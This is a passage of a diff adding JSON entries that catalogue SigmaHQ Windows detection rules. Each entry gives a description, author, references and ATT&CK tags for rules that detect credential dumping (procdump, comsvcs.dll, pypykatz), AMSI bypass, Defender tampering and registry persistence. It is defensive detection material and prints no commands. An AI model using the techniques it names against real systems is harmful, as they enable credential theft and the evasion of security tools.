[ + "Legitimate use of procdump by a developer or administrator" + ], + "filename": "proc_creation_win_procdump.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage" + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Cases in which procdump just gets copied to a different directory without any renaming" + ], + "filename": "proc_creation_win_procdump_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion" + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe" + }, + { + "description": "Detects process memory dump via comsvcs.dll and rundll32 using 
different techniques (ordinal, minidump function...etc)", + "meta": { + "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Wietze/status/1542107456507203586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", + "value": "Process Dump via Rundll32 and Comsvcs.dll" + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/04", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_proc_dump_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump" + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage" + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump" + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage" + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "meta": { + "author": "vburov", + "creation_date": "2019/02/23", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "filename": "proc_creation_win_proc_wrong_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ] + }, + "uuid": "96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory" + }, + { + "description": "Emulates attack via documents through protocol handler in Microsoft Office. 
On successful execution you should see Microsoft Word launch a blank file.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_protocolhandler_susp_file.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "ProtocolHandler.exe Downloaded Suspicious File" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt" + }, + { + "description": "Detects a PsExec service start", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": 
"proc_creation_win_psexesvc_start.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ] + }, + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start" + }, + { + "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", + "meta": { + "author": "@Kostastsale", + "creation_date": "2022/11/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern" + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_defendercheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage" + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_seatbelt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ] + }, + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool" + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_public_folder_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags" + }, + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process" + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_purplesharp_indicators.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ] + }, + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_pypykatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz" + }, 
+ { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "value": "Python Spawning Pretty TTY on Windows" + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_quarks_pwdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage" + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_query_registry.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ] + }, + "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "value": "Query Registry" + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_query_session_exfil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data" + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ransom_blackbyte.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags" + }, + "uuid": "999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns" + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by 
raspberry-robin", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File" + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ] + }, + "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing" + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags" + }, + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + "value": "Suspicious Redirection to Local Admin Share" + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_to_stream.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + "attack.t1059.003", + 
"attack.t1218.011" + ] + }, + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute" + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File" + }, + { + "description": "Detects the export of the target Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate export of keys" + ], + "filename": "proc_creation_win_regedit_export_keys.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File" + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "meta": { + "author": 
"Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "filename": "proc_creation_win_regedit_import_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File" + }, + { + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regedit_import_keys_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": "Imports Registry Key From an ADS" + }, + { + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate modification of keys" + ], + "filename": "proc_creation_win_regini.yml", + "level": "low", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", + "value": "Modifies the Registry From a File" + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regini_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS" + }, + { + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/28", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": 
"proc_creation_win_reg_add_run_key.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", + "value": "Reg Add RUN Key" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_add_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "value": "Add SafeBoot Keys Via Reg Utility" + }, + { + "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_reg_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + 
"https://redcanary.com/threat-detection-report/threats/qbot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", + "value": "Registry Defender Exclusions" + }, + { + "description": "Detects reg command lines that disable certain important features of Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Rare legitimate use by administrators to test software (should always be investigated)" + ], + "filename": "proc_creation_win_reg_defender_tampering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", + "value": "Registry Defender Tampering" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
